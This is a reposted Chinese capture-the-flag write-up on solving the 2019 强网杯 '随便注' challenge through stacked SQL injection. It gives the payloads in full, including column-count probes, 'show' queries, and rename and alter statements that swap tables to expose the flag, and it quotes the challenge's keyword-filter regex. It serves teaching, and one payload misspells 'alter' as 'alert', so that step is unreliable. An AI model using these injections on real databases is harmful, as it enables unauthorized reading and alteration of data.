首页
/
每日頭條
/
生活
/
sql注入漏洞原理與利用
sql注入漏洞原理與利用
更新时间:2025-11-30 16:50:09
[強網杯 2019] 随便注

每天學習網絡安全知識,本文記錄強網杯的一個SQL注入題。

sql注入漏洞原理與利用(黑客必會之SQL注入學習)1

使用單引号測試,發現頁面報錯,說明此處存在SQL注入漏洞。

sql注入漏洞原理與利用(黑客必會之SQL注入學習)2

1' 1''

sql注入漏洞原理與利用(黑客必會之SQL注入學習)3

既然此處存在漏洞,那麼我們就走正常流程測試下,如果不知道SQL注入正常流程的可以去看下我的sqllibs注入教程。

1.猜字段數

1' order by 3# 1' order by 2#

sql注入漏洞原理與利用(黑客必會之SQL注入學習)4

sql注入漏洞原理與利用(黑客必會之SQL注入學習)5

使用第一個payload測試的時候發現頁面報錯,再使用第二個payload時發現頁面顯示正常,因此我們可以得知當前數據庫當前表存在2個字段。這時候嘗試union select進行聯合查詢。

2.使用聯合查詢

sql注入漏洞原理與利用(黑客必會之SQL注入學習)6

return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);

發現頁面提示過濾了許多關鍵的命令,看來需要一些騷操作了。

3.嘗試堆疊注入

1';show databases#

sql注入漏洞原理與利用(黑客必會之SQL注入學習)7

發現成功爆出所有數據庫。使用show tables;試試看看能不能得到表名

-1';show tables#

sql注入漏洞原理與利用(黑客必會之SQL注入學習)8

成功爆出當前數據庫的兩個表名;嘗試查詢表中的字段

0';show columns from `1919810931114514`;#

sql注入漏洞原理與利用(黑客必會之SQL注入學習)9

發現有一個flag字段,接下來就是嘗試讀取flag。

4. 再查看words表的結構

0';desc words;#

sql注入漏洞原理與利用(黑客必會之SQL注入學習)10

可以猜測我們提交查詢的窗口就是在這個表裡查詢數據的。

5. 那麼查詢語句很有可能是 : selsect id,data from words where id =

然後1919810931114514隻有一個flag字段這時候雖然有強大的正則過濾,但沒有過濾alert和rename關鍵字這時候我們就可以已下面的騷姿勢進行注入:1.将words表改名為word1或其它任意名字2.1919810931114514改名為words3.将新的word表插入一列,列名為id4.将flag列改名為data

1';rename table `words` to `word1`;rename table `1919810931114514` to `words`;alter table `words` add id int unsigned not Null auto_increment primary key; alert table `words` change `flag` `data` varchar(100);#

sql注入漏洞原理與利用(黑客必會之SQL注入學習)11

成功拿到flag。

,
Comments
Welcome to tft每日頭條 comments! Please keep conversations courteous and on-topic. To fosterproductive and respectful conversations, you may see comments from our Community Managers.
Sign up to post
Sort by
Show More Comments
推荐阅读
李易峰為什麼對她念念不忘
李易峰為什麼對她念念不忘
近日李易峰趙麗穎在參加騰訊視頻的星光大賞頒獎禮上同台,凡瑤合體甜蜜貼掌撒狗糧,引得網友大呼在一起!李易峰作為當紅鮮肉,自從主演了《古劍奇譚》後一路人氣飙升,與之合作的女演員每個都很優秀漂亮。下面小編就來為大家盤點一下與峰峰合作的女演員都有哪...
2025-11-30
不懂聊天的說說
不懂聊天的說說
54=無視94=就是88=再見5555555……=大哭SJB=神經病K=扁H=黃jj=姐姐GG=哥哥MM=妹妹美眉DD=弟弟LG=垃圾SB=傻XBT=變态BF=男朋友GF=女朋友TOO=吐醬紫=這樣子7飯=吃飯稀飯=喜歡果醬=過獎靠=驚訝(...
2025-11-30
蔣正全救人犧牲
蔣正全救人犧牲
澎湃新聞記者王鑫實習生孟春曉蔣正全“回家”了,回到了那個他成長的地方。門前百米,就是長江一級支流臨江河。作為在河邊長大的農村娃,下河遊泳是再平常不過的事情。2022年8月8日,蔣正全生命中最後一次下水,是為了救人——當天,一輛白色越野車不慎...
2025-11-30
晚娘的拳頭雲裡的日頭是什麼意思
晚娘的拳頭雲裡的日頭是什麼意思
晚娘的拳頭雲裡的日頭是什麼意思?“晚娘的拳頭,雲裡的日頭”,諺語,意思是比喻後母對孩子心狠手毒雲裡的太陽,就是說:看起來可能沒太陽,可是“啞巴太陽曬死人”啊晚娘的拳頭,意思說,晚娘當着人的面或許說的好聽,可真要打人,可是會下死手的,今天小編...
2025-11-30
瘦肉怎麼做長期保存
瘦肉怎麼做長期保存
瘦肉怎麼做長期保存?用鹽腌肉,放冰箱,可放幾天用油炸,能隔絕水和空氣一定時間,可以放幾天,我來為大家科普一下關于瘦肉怎麼做長期保存?下面希望有你要的答案,我們一起來看看吧!瘦肉怎麼做長期保存用鹽腌肉,放冰箱,可放幾天。用油炸,能隔絕水和空氣...
2025-11-30
Copyright 2023-2025 - www.tftnews.com All Rights Reserved